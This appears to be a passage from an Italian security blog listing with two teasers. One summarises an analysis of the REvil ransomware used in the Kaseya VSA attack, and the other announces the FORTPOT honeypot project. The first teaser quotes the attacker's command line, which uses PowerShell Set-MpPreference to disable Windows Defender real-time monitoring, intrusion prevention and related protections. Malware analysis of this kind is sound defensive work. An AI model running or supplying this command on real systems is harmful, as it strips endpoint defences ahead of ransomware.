analysis

Analisi sample Revil kaseya

Inizio della compromissione avviato la compromissione attraverso un canale attendibile; sfruttato la fiducia nel codice dell’agente VSA, riflessa nelle‎‎ esclusioni software anti-malware‎‎ necessarie al software Kaseya. C:\WINDOWS\system32\cmd.exe” /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true – EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode Leggi tutto…

Di frtg, fa

FortPot, attacchi dalla rete

Siamo felici di inaugurare l’avvio del progetto FORTPOT, componente della nostra strategia che focalizza l’attenzione sugli attaccanti. Abbiamo deciso di farlo partendo dalle minacce presenti sulla rete internet e da ciò che colpisce i sistemi esposti. Botnet, scansioni automatizzate, attacchi brute force, exploit e attività di assessment sono alcuni degli attacchi che è Leggi tutto…

Di frtg, fa